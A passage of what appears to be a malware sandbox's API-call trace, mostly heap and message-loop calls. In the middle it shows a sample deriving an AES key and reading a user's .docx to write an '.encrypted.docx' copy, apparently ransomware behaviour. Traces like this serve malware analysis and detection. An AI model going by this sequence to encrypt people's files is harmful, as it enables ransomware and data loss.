(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.952] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.952] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.952] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.953] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cigoy5u5b6axtcb.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.953] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.953] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.953] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cigoy5u5b6axtcb.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.954] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.955] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.955] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.955] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.955] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.957] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x524d, lpOverlapped=0x0) returned 1 [0032.957] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.960] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.961] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.961] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.961] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.961] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.961] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.961] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.961] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.961] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.962] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.962] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.962] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.963] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.963] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1524d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15250) returned 1 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0032.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.964] HeapFree (in: 